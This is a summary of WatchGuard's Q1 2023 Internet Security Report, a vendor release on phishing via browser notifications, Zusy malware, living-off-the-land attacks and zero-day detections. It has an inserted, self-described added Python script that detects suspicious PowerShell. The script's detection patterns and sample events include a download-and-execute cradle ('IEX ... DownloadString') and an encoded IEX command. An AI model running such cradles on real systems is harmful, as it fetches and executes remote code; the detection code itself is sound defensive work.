WatchGuard Technologies, a global leader in unified cybersecurity, has released its latest Internet Security Report, which highlights the top malware trends and network and endpoint security threats observed by the company’s Threat Lab researchers in the first quarter of 2023. The report unveils several key findings, including the increased use of browser-based social engineering strategies by phishers, the emergence of new malware linked to nation states, a rise in living-off-the-land attacks, and the prevalence of zero-day malware.
One of the notable trends identified in the report is the shift by attackers towards browser notifications as a means of social engineering. With web browsers implementing more robust protections against pop-up abuse, phishers have adapted their tactics to exploit browser notifications. Another interesting discovery from the top malicious domains list is the emergence of SEO-poisoning activity in a new destination.
The report also reveals that threats originating from China and Russia account for 75% of the new threats featured in the top ten list for Q1 2023. While these threats have strong ties to nation states, it is important to note that this does not necessarily imply state-sponsored activity. An example highlighted in the report is the Zusy malware family, which makes its debut in the top 10 malware list for this quarter. One variant of Zusy specifically targets China’s population with adware that installs a compromised browser; the attackers then hijack the system’s Windows settings to make that browser the default.
Persistence of attacks against Office products and the End-of-Life (EOL) Microsoft ISA Firewall is another concerning trend identified in the report. Threat Lab analysts observed document-based threats targeting Office products as the most widespread malware in the quarter. Additionally, there was a relatively high number of exploits against Microsoft’s now-discontinued firewall, the ISA Server. It is surprising to see attackers still targeting a product that was discontinued long ago and no longer receives updates, which highlights the need for organizations to remain vigilant and ensure adequate security measures are in place.
Living-off-the-land attacks are on the rise according to the report. The analysis of the ViperSoftX malware in the DNS data for Q1 demonstrates how attackers are leveraging built-in tools provided by operating systems to achieve their objectives. These reports consistently highlight the prevalence of Microsoft Office- and PowerShell-based malware, emphasizing the importance of endpoint protection that can distinguish between legitimate and malicious use of popular tools such as PowerShell.
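The paragraph above calls for endpoint protection that can tell legitimate PowerShell use apart from malicious use. The following is an added example of how such a distinction can be scored from process-creation telemetry; it is not code from WatchGuard or from the report. The indicator list, the weights, the alert threshold of 4, and the four sample events (hosts, users and command lines) are all constructed assumptions for illustration, and the encoded-command sample is built inline so the example runs offline.

```python
"""Score PowerShell process-creation events for living-off-the-land indicators.

Added example (not WatchGuard's code). A single hardening flag such as
-ExecutionPolicy Bypass is common in legitimate automation, so no single
indicator raises an alert; only an accumulation of them does.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# (regex, indicator name, weight) -- weights are assumed values for this example.
INDICATORS = [
    (r"(?i)(^|\s)-(e|ec|en|enc|encodedcommand)\s", "encoded command", 3),
    (r"(?i)-(ep|executionpolicy)\s+bypass", "execution policy bypass", 2),
    (r"(?i)-(w|windowstyle)\s+hidden", "hidden window", 2),
    (r"(?i)-(nop|noprofile)\b", "profile suppressed", 1),
    (r"(?i)\b(iex|invoke-expression)\b", "dynamic code execution", 3),
    (r"(?i)(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|start-bitstransfer)",
     "network download", 3),
    (r"(?i)frombase64string", "inline base64 decoding", 2),
]
THRESHOLD = 4  # assumed alert threshold

# -EncodedCommand takes a base64 string of the UTF-16LE script text.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


@dataclass
class Verdict:
    score: int
    indicators: List[str] = field(default_factory=list)
    decoded: Optional[str] = None  # decoded -EncodedCommand payload, if any

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None  # malformed payload: keep the raw-line indicators only


def score_command(cmdline: str) -> Verdict:
    """Match indicators against the raw command line and its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded is not None else [])
    hits: List[str] = []
    score = 0
    for text in texts:
        for pattern, name, weight in INDICATORS:
            if name not in hits and re.search(pattern, text):
                hits.append(name)
                score += weight
    return Verdict(score, hits, decoded)


def triage(events, threshold: int = THRESHOLD):
    """Return alert records for events whose score reaches the threshold."""
    alerts = []
    for ev in events:
        v = score_command(ev["cmdline"])
        if v.score >= threshold:
            alerts.append({"host": ev["host"], "user": ev["user"], "score": v.score,
                           "indicators": v.indicators, "decoded": v.decoded})
    return alerts


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (used for sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (hosts, users, command lines are made up for this example).
DECODED_SAMPLE = "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))"
EVENTS = [
    {"host": "WS01", "user": r"CORP\alice",
     "cmdline": r"powershell.exe -NoProfile -NonInteractive -File C:\Scripts\Get-DiskReport.ps1"},
    {"host": "WS02", "user": r"CORP\bob",
     "cmdline": r"powershell.exe -nop -w hidden -ep bypass -c "
                r'"IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"'},
    {"host": "WS03", "user": r"CORP\carol",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + encode_ps(DECODED_SAMPLE)},
    {"host": "WS04", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Vendor\update.ps1"'},
]

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert["host"], alert["score"], ", ".join(alert["indicators"]))
```

With these weights the admin script on WS01 (score 1) and the vendor updater on WS04 (score 2) stay below the threshold, while the download cradle on WS02 and the encoded, double-decoding command on WS03 are flagged; decoding the `-EncodedCommand` payload before matching is what exposes the WS03 case, which looks harmless on the raw line alone.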
Furthermore, the report exposes the use of malware droppers targeting Linux-based systems as one of the top malware detections by volume in Q1. This underscores the need for organizations to not overlook Linux and macOS systems, even though Windows remains dominant in the enterprise space. Implementing Endpoint Detection and Response (EDR) that covers non-Windows machines is crucial for ensuring comprehensive coverage across the entire environment.
In terms of detection methods, the report highlights that the majority of detections in Q1 were attributed to zero-day malware. Approximately 70% of detections were related to zero-day malware transmitted over unencrypted web traffic, while a staggering 93% were from zero-day malware transmitted over encrypted web traffic. This emphasizes the significance of robust host-based defenses like WatchGuard EPDR (Endpoint Protection Detection and Response) to safeguard IoT devices, misconfigured servers, and other vulnerable devices.
The report also provides valuable insights based on the tracking of ransomware data. In Q1 2023, the Threat Lab identified 852 victims published on extortion sites and discovered 51 new ransomware variants. These ransomware groups continue to target numerous well-known organizations and companies, including Fortune 500 companies. WatchGuard plans to release more findings on ransomware tracking and analysis in their future reports.
Corey Nachreiner, Chief Security Officer at WatchGuard, highlights the importance of maintaining active and ongoing attention to security solutions and strategies. He emphasizes the need for layered malware defenses to combat living-off-the-land attacks effectively. By implementing a unified security platform managed by dedicated service providers, organizations can ensure a simple and efficient approach to protecting themselves against increasingly sophisticated threats.
As part of WatchGuard’s Unified Security Platform approach, the quarterly Internet Security Report offers anonymized and aggregated threat intelligence gathered from active WatchGuard network and endpoint products. This data is voluntarily shared by the owners of these products to support WatchGuard’s research efforts.
For this Q1 2023 analysis, the Threat Lab team has enhanced the methods used to normalize, analyze, and present the report findings. Unlike previous reports that primarily presented global total volumes, the network security results for this quarter and future reports will be presented as “per device” averages for all reporting network appliances. The report includes a detailed explanation of this evolution and the reasoning behind the updated methodology. It also provides additional insights into malware, network, and ransomware trends from Q1 2023, along with recommended security strategies and critical defense tips for businesses of all sizes and across industries.
To gain a more comprehensive understanding of WatchGuard’s research, interested individuals can access the complete Q1 2023 Internet Security Report on their website.
WatchGuard Technologies, Inc. is a leading global provider of unified cybersecurity solutions. Its Unified Security Platform approach is specifically designed for managed service providers to deliver world-class security, enhancing their business scale and velocity while improving operational efficiency. Trusted by over 17,000 security resellers and service providers, WatchGuard protects more than 250,000 customers worldwide. The company’s portfolio includes network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi solutions. These offerings encompass comprehensive security, shared knowledge, clarity & control, operational alignment, and automation – the five critical elements of a reliable security platform. Headquartered in Seattle, Washington, WatchGuard maintains offices across North America, Europe, Asia Pacific, and Latin America.
For additional information, promotions, and updates, individuals can follow WatchGuard on Twitter, Facebook, and LinkedIn. They can also visit the InfoSec blog, Secplicity, for real-time information about the latest threats and ways to mitigate them. Additionally, WatchGuard offers a podcast called “The 443 – Security Simplified” available on their website and other popular podcast platforms.
WatchGuard Technologies, Inc. holds the registered trademark for the WatchGuard name. All other trademarks mentioned in the report are the property of their respective owners.